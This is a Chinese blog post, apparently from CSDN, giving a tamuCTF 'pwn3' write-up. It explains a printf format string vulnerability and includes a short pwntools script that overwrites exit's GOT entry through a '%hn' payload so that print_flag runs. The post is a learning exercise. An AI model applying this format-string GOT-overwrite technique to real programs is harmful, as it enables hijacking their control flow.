格式化字符漏洞 tamuCTF pwn3 writeup

最新推荐文章于 2024-06-03 20:28:40 发布
最新推荐文章于 2024-06-03 20:28:40 发布
阅读量1k 收藏 1
点赞数
分类专栏: 二进制-逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/72864911
版权

之前一直不怎么会格式化字符串的漏洞,刚好碰上这道题,学习一波

首先看下main函数,读一个字符串,然后打印出来,之后直接exit(0) 无法利用栈溢出跳转,但是prinf是直接打印读取的东西,这里就存在一个格式化字符串漏洞。
这里写图片描述

这里推荐一个格式化字符串漏洞入门的教程:
http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html
建议看完这个教程之后再来看我的wp

首先看一下字符串在第几个参数,这里可以看出是第4个参数,其实也可以用gdb看内存看出来,只不过麻烦一点。
这里写图片描述

看了下,它自带了print_flag()函数,那么思路就很明显,只要利用格式化字符串漏洞覆写got表,将exit的地址改成print_flag()的地址就行

下面就是脚本

from pwn import *


#p = process('./pwn3')
p=remote('pwn.ctf.tamu.edu',4323)
exit_got=0x0804A01C #这里是要exit的got表所在地址
payload=p32(exit_got)+'%'+str(34219-4)+'x%4$hn' #首先写上要覆写的地址,然后% str(34219)x就是要向所在地址写入的值,%4$hn,就是代表向第四个参数所在的地址写入前面的值
p.sendline(payload)
flag=p.recvall()
print flag
charlie_heng
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[PWN]——格式化字符漏洞(包含几种解题方法)
ysy___ysy的博客
01-19 2051
如果要自己采用"%x$n"的方式手动构造payload容易出错,所以使用pwntools中的FmtStr格式化字符串类来解决格式化字符漏洞比较方便做题。如果有什么错误的地方请师傅们告诉我一下。本文制作不易,盗版必究。
【pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 5797
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例题 利用格式化字符漏洞获取libc基址覆盖内存栈地址覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个部分。 格式化字符串函
[Litctf 2024] Pwn WP 全部题目
最新发布
红叶的博客
06-03 789
劫持 __malloc_hook 打 one_gadget。使用 realloc 调整栈帧。
pwn 格式化字符漏洞及例题
limenzzz的博客
10-21 1829
一些输出函数例如printf,sprintf都接受参数输入,例如printf("%d",s)。但如果在编写函数时为方便写为printf(s),则可通过对s输入的构造来执行一些操作。 在其中常见的有通过-%p %08x等参数来查看偏移值,简单来说,就是输入的值存在于栈的哪个地方。
pwn3-绕过防御-ROP(1)
qq_73667990的博客
06-08 795
*ROP:**全程Return Oriented Programming(面向返回的编程),在栈溢出基础上,利用程序中已有的小片段(gadgets),改变寄存器或变量的值,从而控制程序执行流程,从而绕过NX防御,常见有ret2text,ret2syscall,ret2libc(最常用)…**gadgets:**以ret结尾的指令序列,通过这些序列可以修改某些地址的内容。ROP攻击满足的条件:1.存在溢出,且可以控制返回地址2.满足条件的gadgets。
CTF PWN-攻防世界CGfsb格式化字符漏洞
道阻且长,行则将至。
07-23 1803
距离 2021 年年底短暂接触学习 CTF PWN 相关知识(CTF PWN-攻防世界XCTF新手区WriteUp)已经是快 2 年前的事了,这期间就连攻防世界社区的站点都发生巨大变化了……为了学习终端领域底层漏洞的挖掘和利用技术,继续积累 PWN 相关知识。
pwn栈溢出10道练习题有writeup
01-04
4. **格式字符漏洞**:特定函数如`printf`和`scanf`允许使用格式化字符串,如果用户输入不受限制,可以导致栈溢出。学习如何识别和利用这些漏洞是pwn题目的常见部分。 5. **堆溢出**:虽然题目主要关注栈溢出,但...
D3CTF2022-官方WriteUp1
08-03
在本题中,还存在一些非预期的解答方法,例如使用 BadAttributeValueExpException 触发 toString 的链来减少生成的序列化字符串的长度。 7. MySQL UDF 提权 Exploit 攻击者可以使用 MySQL UDF 提权来攻击 MySQL ...
2020 蓝帽杯线下赛PWN WriteUp .pdf
09-05
Pwn类题目通常涉及到缓冲区溢出、格式字符漏洞、整数溢出等,目标是通过编写特定的payload来获取远程服务器的shell或控制系统。 在这个题目中,挑战是通过执行shellcode来获取flag。shellcode是一种用于利用缓冲...
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
TIM3_PWN呼吸灯.zip
10-12
本项目“TIM3_PWN呼吸灯.zip”聚焦于使用STM32的通用定时器TIM3来实现一个常见的LED呼吸灯效果,该效果通过PWM(脉宽调制)技术来实现。PWM是一种在数字系统中模拟模拟信号的技术,它通过改变信号的占空比(高电平...
CTF-PWN笔记(二)-- 格式化字符漏洞
CK_0ff的博客
01-27 1236
文章目录漏洞介绍格式化字符串的格式漏洞原理及利用例题 漏洞介绍 格式化字符串(英语:format string)是一些程序设计语言的输入/输出库中能将字符串参数转换为另一种形式输出的函数。例如C、C++等程序设计语言的printf类函数,其中的转换说明(conversion specification)用于把随后对应的0个或多个函数参数转换为相应的格式输出;格式化字符串中转换说明以外的其它字符原样输出。 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。 通俗来
格式化字符漏洞
IT_huanhuan的博客
05-25 1112
格式化字符串是由普通字符(包括%)和转换规则构成的字符序列。普通字符被原封不动地复制到输出流中。转换规则根据与实参对应的转换指示符对其进行转换,然后将结果写入到输出流中。转换规则由可选的部分和必选部分组成。其中只有转换指示符type是必选部分,用来表示转换类型。用 printf() 为例,它的第一个参数就是格式化字符串 :“Color %s,Number %d,Float %4.2f”然后 printf 函数会根据这个格式化字符串来解析对应的其他参数。
pwn学习笔记(5)--格式化字符漏洞(未完全完成)
qq_66013948的博客
03-05 1175
格式化字符串函数可以接收可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数格式化字符串函数格式化字符串[后续参数]
CTF pwn题之格式化字符漏洞详解
热门推荐
lifanxin的博客
03-22 1万+
FmtStr格式化字符串类概念求偏移和任意地址写求偏移任意地址写一个例子程序分析漏洞利用wp总结 概念 在遇到pwn题中格式化字符漏洞时,我们一般会分两大步实现漏洞利用:首先构造一个payload来寻找输入字符串到栈顶指针的偏移,然后利用偏移实现对目标地址的改写。下面我将介绍pwntools中的FmtStr类如何实现偏移的求解以及对目标地址的改写。 求偏移和任意地址写 求偏移 在格式化字符漏洞利用中,我们一般都是这样手动构造payload进行偏移求解的,如下图所示,开头输入方便定位的字符串aaaa,然后
利用格式化字符漏洞实现任意地址读写
个人笔记
06-01 3414
理解格式化字符漏洞关键还是在于理解栈空间布局,任意地址写初学者接触到可能较为抽象,但是结合栈空间布局以及格式化字符串的原理,详细我们就能对格式化字符串有个更加清晰的认知。如果能够复现上述漏洞案例,那么恭喜你,已经完成了 pwn 格式化字符漏洞这一旅程。
格式化字符串】格式化字符漏洞的原理与利用
qcwwww的博客
07-11 966
格式化字符串】格式化字符漏洞的原理与利用
BUUCTF之PWN(WP1)
NANMUZN的博客
01-15 629
buuctf pwn
NKCTF pwn方向wp
maple105890的博客
03-27 501
然后放堆快指针的附近有malloc_context+0x18的地址,里面有很多dirty_data,而且got表可写,泄露出来打free函数。然后发现二次输入能直接把rbp末尾覆盖成\x00,那就在栈中构造rop链就好了。所以考虑和ez_stack一样的做法,比爆破ogg快多了。虽然给了libc,但构造了⼀下shellcode也能出。存在格式化字符漏洞,先把cananry泄露出来。给了libc,可以光明正大偷鸡了bushi。直接rand搞一下就出了,连爆破都不用。和西湖那题有一点像,但那题还要抬栈。
pwn格式化字符漏洞
08-30
pwn中的格式化字符漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式化字符漏洞通常发生在使用格式化输出函数(如printf)时,输入的格式字符串中包含了未经验证的用户输入。攻击者可以通过修改格式字符串中的特殊格式标识符来读取或修改内存中的数据。 为了防止格式化字符漏洞,开发者应该对用户输入进行严格的验证和过滤,确保输入的格式字符串没有恶意的内容。此外,可以使用安全的格式化输出函数(如snprintf)来替代不安全的输出函数,以提高代码的安全性。 如果你需要更详细的信息,请告诉我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值